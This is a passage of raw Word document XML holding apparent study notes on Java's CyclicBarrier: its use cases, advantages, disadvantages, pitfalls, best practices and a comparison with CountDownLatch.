            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="336F208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sBroken()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="493FC0D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turns true if the barrier is in a broken state</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C049AD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5737E55E">
          <v:rect id="_x0000_i6853" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4747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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4843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Parallel Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Splitting a large computation into subtasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2334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Game Engines:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Synchronizing multiple threads before proceeding to the next level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14656B2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Multiphase Tasks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Waiting for threads to complete one phase before moving to the next.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CD956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atch Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aggregating data from multiple sources before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8A9F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16672377">
          <v:rect id="_x0000_i6854" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE437F"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6215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="67B8BF9B" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62005140"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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4139F6A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1D61D182" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359B941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High Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C8C4C8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hreads can perform tasks independently until the barrier is reached</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="75CE0D11" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CAF2D9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77759B2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be reused after all threads have reached the barrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="13A4213C" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD8469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Optional Runnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="101869E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execute a task after the last thread reaches the barrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="1DC6C1E2" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A9BAB81"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Simplifies Coordination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610F29E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Eliminates the need for manual synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D08BB7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0DC83751">
          <v:rect id="_x0000_i6855" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C9F33"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6433"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="6FC5FFC6" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1644086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isadvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B03E71C"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="6B61EE40" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19F250A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Deadlock Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="000C1A84"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gets stuck or fails, other threads may be blocked indefinitely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="7094494F" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26FE053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roken Barrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1AC8BF"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is interrupted or times out, the barrier becomes broken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="1EE081DE" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CD5AB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Not for Dynamic Threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="781D80B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Requires specifying the number of threads upfront</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25E2E5E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54FEE2E9">
          <v:rect id="_x0000_i6856" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AE15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0. CyclicBarrier vs CountDownL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4058"/>
        <w:gridCol w:w="4481"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="5A194EAC" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC32A82"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="564292A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yclicBarrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5300A07A"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ountDownLatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="5D1E4FCB" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17EBFAF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Reusability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5307D7C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Yes, can be reused after all threads are released</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EEEE04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cannot be reused once the count reaches zero</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="4A394098" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE7F67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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53E7E7C9"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Wait for multiple threads to reach a common point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02B3E3D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One or more threads wait for a fixed number of operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="7334741B" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="116FE09D"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Number of Threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C08A5E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Must be specified during initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D1519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Can vary, as it decrements on each countDown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="1495A685" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E5736F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arrier Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32E508BC"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Supports an optional action when tripped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="178CEE1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barrier action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01090" w:rsidRPr="00B01090" w14:paraId="2019DC81" w14:textId="77777777" w:rsidTr="00B01090">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C21F37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Exception Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D85EA15"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Throws BrokenBarrierException if any thread fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2571F6E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No such exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B2CF983"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5153DF3B">
          <v:rect id="_x0000_i6857" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CD65B"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1. Real-World Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15682AA4"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Parallel Data Aggregation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5838974A"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Suppose you have multiple sources that collect data concurrently. You can use CyclicBarrier to synchronize the aggregation of this data after all sources have completed their collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10D730"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Simulation of Multi-Stage Pipeline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371C161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A pipeline with multiple stages, where each stage requires completion before moving to the next. Threads can work independently on different stages and wait for others at the end of each stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B885F6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19A7CB6E">
          <v:rect id="_x0000_i6858" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C0AD3D"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2. Pitfalls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2C73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lastRenderedPageBreak/>
        <w:t>Deadlock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6067F5"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fails to reach the barrier, other threads will wait indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03811506"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Broken Barrier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1033C4"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a thread gets interrupted or times out, the barrier is broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E9C9A"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Use isBroken() to check the state of the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EA94D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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5CCE3A" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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If the number of waiting threads never reaches the required count, it can cause a thread leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666063E8"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5533EB24">
          <v:rect id="_x0000_i6859" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE59725"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13. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4347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Always handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BrokenBarrierException</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BCB042"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Check the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>barrier state</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using isBroken() if exceptions occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2D2AE"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in await() to prevent infinite blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43193D0B"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Prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reuse the barrier multiple times</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a cyclic manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47B520"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pict w14:anchorId="43D0960D">
          <v:rect id="_x0000_i6860" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC5634" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83F0F7" w14:textId="77777777" w:rsidR="00B01090" w:rsidRPr="00B01090" w:rsidRDefault="00B01090" w:rsidP="00B01090">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CyclicBarrier is a powerful synchronization tool when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple threads to reach a common point before proceeding</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Its </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cyclic nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes it reusable for repetitive tasks, unlike CountDownLatch. However, be mindful of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>potential deadlocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>broken barriers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01090">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when implementing it in multi-threaded applications.</w:t>
      </w:r>
    </w:p>
